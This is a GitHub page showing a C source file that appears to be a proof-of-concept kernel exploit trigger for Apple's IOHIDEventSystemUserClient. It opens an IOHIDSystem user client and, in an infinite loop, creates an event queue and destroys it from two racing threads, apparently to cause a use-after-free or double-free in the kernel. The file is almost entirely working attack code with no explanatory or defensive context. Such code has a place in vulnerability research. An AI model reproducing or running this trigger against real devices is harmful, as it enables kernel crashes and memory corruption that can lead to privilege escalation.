forked from iMokhles/IOHIDEventSystemUserClient
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathIOHIDEventSystemUserClient.c
131 lines (103 loc) · 2.77 KB
/
IOHIDEventSystemUserClient.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <time.h>
#include <IOKit/IOKitLib.h>
#include <pthread.h>
io_connect_t conn = MACH_PORT_NULL;
uint32_t callCreate(io_connect_t conn) {
kern_return_t err;
uint64_t inputScalar[16];
uint64_t inputScalarCnt = 2;
inputScalar[0] = 0;
inputScalar[1] = 32;
char inputStruct[4096];
size_t inputStructCnt = 0;
uint64_t outputScalar[16];
uint32_t outputScalarCnt = 1;
char outputStruct[4096];
size_t outputStructCnt = 0;
err = IOConnectCallMethod(
conn,
0,
inputScalar,
inputScalarCnt,
inputStruct,
inputStructCnt,
outputScalar,
&outputScalarCnt,
outputStruct,
&outputStructCnt);
if (err != KERN_SUCCESS){
printf("unable to createEventQueue 0x%x\n", err);
}
return outputScalar[0];
}
void callDestroy(io_connect_t conn, uint32_t queueID) {
kern_return_t err;
uint64_t inputScalar[16];
uint64_t inputScalarCnt = 2;
inputScalar[0] = 0;
inputScalar[1] = queueID;
char inputStruct[4096];
size_t inputStructCnt = 0;
uint64_t outputScalar[16];
uint32_t outputScalarCnt = 0;
char outputStruct[4096];
size_t outputStructCnt = 0;
err = IOConnectCallMethod(
conn,
1,
inputScalar,
inputScalarCnt,
inputStruct,
inputStructCnt,
outputScalar,
&outputScalarCnt,
outputStruct,
&outputStructCnt);
if (err != KERN_SUCCESS){
printf("unable to destroyEventQueue 0x%x\n", err);
}
}
void race(uint32_t queueID) {
callDestroy(conn, queueID);
}
int main(int argc, char const *argv[])
{
kern_return_t err;
CFMutableDictionaryRef matching = IOServiceMatching("IOHIDSystem");
if(!matching){
printf("unable to create service matching dictionary\n");
return 0;
}
io_iterator_t iterator;
err = IOServiceGetMatchingServices(kIOMasterPortDefault, matching, &iterator);
if (err != KERN_SUCCESS){
printf("no matches\n");
return 0;
}
io_service_t service = IOIteratorNext(iterator);
if (service == IO_OBJECT_NULL){
printf("unable to find service\n");
return 0;
}
printf("got service: %x\n", service);
err = IOServiceOpen(service, mach_task_self(), 3, &conn);
if (err != KERN_SUCCESS){
printf("unable to get user client connection\n");
return 0;
}
printf("got userclient connection: %x\n", conn);
while(1) {
uint32_t queueID = callCreate(conn);
pthread_t t;
pthread_create(&t, NULL, (void *(*)(void *)) race, (void*) (uint32_t)queueID);
callDestroy(conn, queueID);
pthread_join(t, NULL);
}
return 0;
}